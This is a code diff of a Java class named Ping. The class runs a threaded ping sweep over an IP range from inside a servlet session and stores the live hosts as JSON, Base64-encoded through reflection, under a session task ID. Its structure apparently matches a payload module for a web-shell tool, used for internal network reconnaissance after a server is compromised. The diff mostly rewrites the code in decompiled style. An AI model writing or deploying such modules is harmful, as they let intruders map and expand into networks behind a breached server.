@@ -23,82 +23,108 @@ public class Ping implements Runnable {
     }
 
     public void execute(ServletRequest request, ServletResponse response, HttpSession session) throws Exception {
-        new Thread(new Ping(session)).start();
+        (new Thread(new Ping(session))).start();
     }
 
     private static int ip2int(String ip) throws UnknownHostException {
         int result = 0;
-        for (byte b : InetAddress.getByName(ip).getAddress()) {
-            result = (result << 8) | (b & 255);
+        InetAddress addr = InetAddress.getByName(ip);
+        byte[] var3 = addr.getAddress();
+        int var4 = var3.length;
+
+        for (int var5 = 0; var5 < var4; ++var5) {
+            byte b = var3[var5];
+            result = result << 8 | b & 255;
         }
+
         return result;
     }
 
     private static String int2ip(int value) throws UnknownHostException {
-        return InetAddress.getByAddress(BigInteger.valueOf(value).toByteArray()).getHostAddress();
+        byte[] bytes = BigInteger.valueOf(value).toByteArray();
+        InetAddress address = InetAddress.getByAddress(bytes);
+        return address.getHostAddress();
     }
 
     public static void main(String[] args) {
         String start = ipList.split("-")[0];
         String stop = ipList.split("-")[1];
+
         try {
-            ip2int(start);
-            ip2int(stop);
-            for (int i = ip2int(start); i < ip2int(stop); i++) {
-                InetAddress.getByName(int2ip(i)).isReachable(3000);
+            int startValue = ip2int(start);
+            int stopValue = ip2int(stop);
+
+            for (int i = ip2int(start); i < ip2int(stop); ++i) {
+                String ip = int2ip(i);
+                boolean var7 = InetAddress.getByName(ip).isReachable(3000);
             }
-        } catch (Exception e) {
+        } catch (Exception var8) {
         }
+
     }
 
     public void run() {
         String start = ipList.split("-")[0];
         String stop = ipList.split("-")[1];
-        Map<String, String> sessionObj = new HashMap<>();
-        Map<String, String> scanResult = new HashMap<>();
+        Map sessionObj = new HashMap();
+        Map scanResult = new HashMap();
         sessionObj.put("running", "true");
+
         try {
             int startValue = ip2int(start);
             int stopValue = ip2int(stop);
-            for (int i = startValue; i <= stopValue; i++) {
+
+            for (int i = startValue; i <= stopValue; ++i) {
                 String ip = int2ip(i);
-                if (InetAddress.getByName(ip).isReachable(3000)) {
+                boolean isAlive = InetAddress.getByName(ip).isReachable(3000);
+                if (isAlive) {
                     scanResult.put(ip, "true");
-                    sessionObj.put("result", buildJson(scanResult, false));
+                    sessionObj.put("result", this.buildJson(scanResult, false));
                 }
+
                 this.Session.setAttribute(taskID, sessionObj);
             }
-        } catch (Exception e) {
-            sessionObj.put("result", e.getMessage());
+        } catch (Exception var10) {
+            sessionObj.put("result", var10.getMessage());
         }
+
         sessionObj.put("running", "false");
     }
 
-    private String buildJson(Map<String, String> entity, boolean encode) throws Exception {
+    private String buildJson(Map entity, boolean encode) throws Exception {
         StringBuilder sb = new StringBuilder();
         String version = System.getProperty("java.version");
         sb.append("{");
-        for (String key : entity.keySet()) {
+
+        for (Object o : entity.keySet()) {
+            String key = (String) o;
             sb.append("\"" + key + "\":\"");
-            String value = entity.get(key);
+            String value = ((String) entity.get(key));
             if (encode) {
+                Class Base64;
+                Object Encoder;
                 if (version.compareTo("1.9") >= 0) {
-                    getClass();
-                    Class Base64 = Class.forName("java.util.Base64");
-                    Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
+                    this.getClass();
+                    Base64 = Class.forName("java.util.Base64");
+                    Encoder = Base64.getMethod("getEncoder", (Class[]) null).invoke(Base64, (Object[]) null);
                     value = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, value.getBytes(StandardCharsets.UTF_8));
                 } else {
-                    getClass();
-                    Object Encoder2 = Class.forName("sun.misc.BASE64Encoder").newInstance();
-                    value = ((String) Encoder2.getClass().getMethod("encode", byte[].class).invoke(Encoder2, value.getBytes(StandardCharsets.UTF_8))).replace("\n", "").replace("\r", "");
+                    this.getClass();
+                    Base64 = Class.forName("sun.misc.BASE64Encoder");
+                    Encoder = Base64.newInstance();
+                    value = (String) Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, value.getBytes(StandardCharsets.UTF_8));
+                    value = value.replace("\n", "").replace("\r", "");
                 }
             }
+
             sb.append(value);
             sb.append("\",");
         }
+
         if (sb.toString().endsWith(",")) {
             sb.setLength(sb.length() - 1);
         }
+
         sb.append("}");
         return sb.toString();
     }
